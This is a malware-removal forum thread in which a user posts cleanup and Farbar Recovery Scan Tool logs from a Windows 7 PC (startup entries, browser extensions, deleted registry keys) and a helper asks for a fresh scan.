2014-10-27 21:36:08   730313487A4CF7DCAA4039643F72A1BE   184027   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\misc.bat
2014-10-27 21:36:08   4D80C7010E2CE44AB25FA25B013649E4   8085   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\mws.bat
2014-10-27 21:36:08   38A0BDF322ACCC968B0A824C38D50157   29635   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\ask.bat
2014-10-27 21:36:08   335DFF8F23E5EC02B5426362F0F8509B   31401   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\iexplore.bat
2014-10-27 21:36:08   323C58D6693BEC9A6A37566F37D81B22   9469   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\runvalues.bat
2014-10-27 21:36:08   0C4649A62845AB5D5DBCC4998477FF6D   1813   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\delfolders.bat
2014-10-27 21:36:08   048407135C9B1FB6A355E256BD96160D   14192   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\chrome.bat
2014-10-27 14:08:56   F627BFFCC52587350E49FC2C2A03C7F9   43064   ----a-w-   C:\Windows\System32\drivers\avnetflt.sys
2014-10-27 14:06:36   43552F707825F03E84C0FA217DBA3868   42088   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\sweb.zip
2014-10-27 14:06:34   F627BFFCC52587350E49FC2C2A03C7F9   43064   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avnetflt.sys
2014-10-27 14:06:34   AF61774060F277FE45CBD3A9A8E7D45A   131608   ----a-w-   C:\Windows\System32\drivers\avipbb.sys
2014-10-27 14:06:34   AF61774060F277FE45CBD3A9A8E7D45A   131608   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avipbb.sys
2014-10-27 14:06:34   390184FAD8FCC1B6DA25AEBAE928C3B6   28600   ----a-w-   C:\Windows\System32\drivers\avkmgr.sys
2014-10-27 14:06:34   390184FAD8FCC1B6DA25AEBAE928C3B6   28600   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avkmgr.sys
2014-10-27 14:06:34   1B87A1F2FA5B91AC1A7D171B8D952441   119272   ----a-w-   C:\Windows\System32\drivers\avgntflt.sys
2014-10-27 14:06:34   1B87A1F2FA5B91AC1A7D171B8D952441   119272   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avgntflt.sys
2014-10-27 14:05:52   7468B9C673100AF1F7DC3CAD9C87F896   60979   ----a-w-   C:\Windows\Temp\1274886llang.bin.zip
2014-10-27 14:05:46   902CB3D0BFB2DFE35E171D3DFE24325D   940905   ----a-w-   C:\ProgramData\Avira\My Avira\Temp\abs.xpi
2014-10-27 08:04:38   4AC75A9F5F7318FF53BC435DCFBF5A64   979610   ----a-w-   C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
2014-10-27 08:03:41   916EAAEBD47472680AE11A464D18CD72   542926   ----a-w-   C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
2014-10-24 07:06:07   E9981ECE8D894CEF7038FD1D040EB426   56832   ----a-w-   C:\Windows\System32\drivers\TsUsbFlt.sys
2014-10-24 06:56:33   313F68E1A3E6345A4F47A36B07062F34   19456   ----a-w-   C:\Windows\System32\drivers\rdpvideominiport.sys
2014-10-21 08:53:35   3BF8606E0A568087AC42F81B7FEECEBB   18839595   ----a-w-   C:\Users\McLain\Videos\Pure Trance\Pure Trance.zip

==== Startup Registry Enabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Avira Systray"="C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe"
"avgnt"="C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe /min"

==== Startup Registry Disabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe ARM]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Adobe ARM"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AdobeAAMUpdater-1.0]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="AdobeAAMUpdater-1.0"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\UpdaterStartupUtility.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AdobeCS6ServiceManager]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="AdobeCS6ServiceManager"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\CS6ServiceManager\\CS6ServiceManager.exe\" -launchedbylogin"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CCleaner Monitoring]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="CCleaner Monitoring"
"hkey"="HKCU"
"command"="\"C:\\Program Files\\CCleaner\\CCleaner64.exe\" /MONITOR"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HDAudDeck]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="HDAudDeck"
"hkey"="HKLM"
"command"="C:\\Program Files (x86)\\VIA\\VIAudioi\\VDeck\\VDeck.exe -r"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Logitech Download Assistant]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Logitech Download Assistant"
"hkey"="HKLM"
"command"="C:\\Windows\\system32\\rundll32.exe C:\\Windows\\System32\\LogiLDA.dll,LogiFetch"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QuickTime Task]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="QuickTime Task"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\QuickTime\\QTTask.exe\" -atboottime"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\RunAIShell]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="RunAIShell"
"hkey"="HKLM"
"command"="C:\\Program Files (x86)\\ASUS\\AI Manager\\AsShellApplication.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SansaDispatch]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="SansaDispatch"
"hkey"="HKCU"
"command"="C:\\Users\\McLain\\AppData\\Roaming\\SanDisk\\Sansa Updater\\SansaDispatch.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Skype"
"hkey"="HKCU"
"command"="\"C:\\Program Files (x86)\\Skype\\Phone\\Skype.exe\" /minimized /regrun"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\StartCCC]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="StartCCC"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\ATI Technologies\\ATI.ACE\\Core-Static\\CLIStart.exe\" MSRun"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="SunJavaUpdateSched"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SwitchBoard]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="SwitchBoard"
"hkey"="HKLM"
"command"="C:\\Program Files (x86)\\Common Files\\Adobe\\SwitchBoard\\SwitchBoard.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\tvncontrol]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="tvncontrol"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\COMODO\\GeekBuddyRSP.exe\" -controlservice -slave"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ASUS PCE-N53 WLAN Control Center.lnk]
"path"="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ASUS PCE-N53 WLAN Control Center.lnk"
"backup"="C:\\Windows\\pss\\ASUS PCE-N53 WLAN Control Center.lnk.CommonStartup"
"backupExtension"=".CommonStartup"
"command"="C:\\PROGRA~2\\ASUS\\PCE-N5~1\\Common\\RaUI.exe -s"
"item"="ASUS PCE-N53 WLAN Control Center"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^NETGEAR WN111v2 Smart Wizard.lnk]
"path"="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NETGEAR WN111v2 Smart Wizard.lnk"
"backup"="C:\\Windows\\pss\\NETGEAR WN111v2 Smart Wizard.lnk.CommonStartup"
"backupExtension"=".CommonStartup"
"command"="C:\\PROGRA~2\\NETGEAR\\WN111v2\\WN111v2.exe "
"item"="NETGEAR WN111v2 Smart Wizard"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"path"="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Start GeekBuddy.lnk"
"backup"="C:\\Windows\\pss\\Start GeekBuddy.lnk.CommonStartup"
"backupExtension"=".CommonStartup"
"command"="C:\\PROGRA~1\\COMODO\\GEEKBU~1\\launcher.exe \"unit_manager.exe\""
"item"="Start GeekBuddy"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\AMD External Events Utility]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\Device Handle Service]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\GeekBuddyRSP]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\jswpsapi]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\RalinkRegistryWriter]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\RealtekSE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\Steam Client Service]

==== Startup Folders ======================

2011-07-13 07:05:00   831   ----a-w-   C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ [undetermined Task]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/17/2014 08:16 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [10/17/2014 08:16 PM]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\CCleanerSkipUAC" ["C:\Program Files\CCleaner\CCleaner.exe"]
"C:\Windows\SysNative\tasks\Game_Booster_AutoUpdate" [C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\SidebarExecute" [C:\Program Files\Windows Sidebar\sidebar.exe]
"C:\Windows\SysNative\tasks\{512B4F1F-A37C-4F6C-8D18-466D7A964A4D}" [C:\Program Files (x86)\Skype\\Phone\Skype.exe]
"C:\Windows\SysNative\tasks\ASUS\AsBackupWizard_Run" [C:\Program Files (x86)\ASUS\AsBackupWizard\AsRunBkWizardHelper.exe]
"C:\Windows\SysNative\tasks\ASUS\ASUS RegRun Loader" [C:\Program Files (x86)\ASUS\AASP\1.00.97\AsLoader.exe]
"C:\Windows\SysNative\tasks\ASUS\ASUS Update Checker" [C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe]
"C:\Windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start osppsvc]

==== Firefox Extensions ======================

ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101
- Undetermined - {73a6fe31-595d-460b-a920-fcc0f8843232}
- Custom New Tab - %ProfilePath%\extensions\CNT@ednovak.net.xpi
- Magic Actions for YouTube - %ProfilePath%\extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi
- NoScript - %ProfilePath%\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
- Skype Click to Call - %AppDir%\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi

==== Firefox Plugins ======================

Profilepath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101
63F8C13F269B10BC9363B007DAAACAE6   - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll -   Shockwave Flash

==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
flliilndjeohchalpbbcdekjklbdgfkk - No path found[]
kcendgajlhoaiiccpijilcpmgphfflnj - C:\Users\McLain\AppData\Local\newhb.crx[]

HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\Extensions
kcendgajlhoaiiccpijilcpmgphfflnj - C:\Users\McLain\AppData\Local\newhb.crx[]

Google Docs - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
Google Voice Search Hotword (Beta) - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn
YouTube - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Foxtab Speed Dial - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj
Google Wallet - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== Chromium Fix ======================

C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com/"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
No DefaultScope Set For HKCU

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com/"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{B4A8FFE1-FB76-4A8C-8A36-38E7F834F6B6} Google Url="http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\flliilndjeohchalpbbcdekjklbdgfkk deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj deleted successfully
HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj deleted successfully
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sansa Updater deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeAAMUpdater-1.0 deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeCS6ServiceManager deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SwitchBoard deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\tvncontrol deleted successfully

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\McLain\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\McLain\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

C:\Users\McLain\AppData\Local\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\cache2 emptied successfully

==== Empty Chrome Cache ======================

C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=482 folders=121 24434393 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\temp emptied successfully
C:\Users\Default User\AppData\Local\temp emptied successfully
C:\Users\LogMeInRemoteUser\AppData\Local\temp emptied successfully
C:\Users\McLain\AppData\Local\Temp will be emptied at reboot
C:\Users\Public\AppData\Local\temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp will be emptied at reboot
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\McLain\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcore.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftevent.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftintf.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcore.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftevent.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftintf.dll" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client" not found
"C:\PROGRA~2\Microsoft Application Virtualization Client" not found
"C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp\Low" not deleted

==== EOF on Mon 10/27/2014 at 17:42:50.21 ======================

Naathim · October 28, 2014

Hi

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

bmclain · October 28, 2014

Hi again, so far no instances.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-10-2014
Ran by McLain (administrator) on MCLAIN-PC on 28-10-2014 01:51:42
Running from C:\Users\McLain\Desktop
Loaded Profile: McLain (Available profiles: McLain)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
() C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Microsoft Corporation) C:\Windows\System32\audiodg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe [124720 2014-10-09] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [703736 2014-09-24] (Avira Operations GmbH & Co. KG)
Startup: C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {012E1000-F331-11DB-8314-0800200C9A66} URL = http://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {012E1000-F331-11DB-8314-0800200C9A66} URL = http://www.google.com/search?q={searchTerms}
DPF: HKLM {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://qtinstall.apple.com/qtactivex/qtplugin.cab
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101
FF NewTab: www.google.com
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
FF Plugin: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin-x32: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Custom New Tab - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\CNT@ednovak.net.xpi [2013-07-18]
FF Extension: Magic Actions for YouTube™ - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi [2014-09-15]
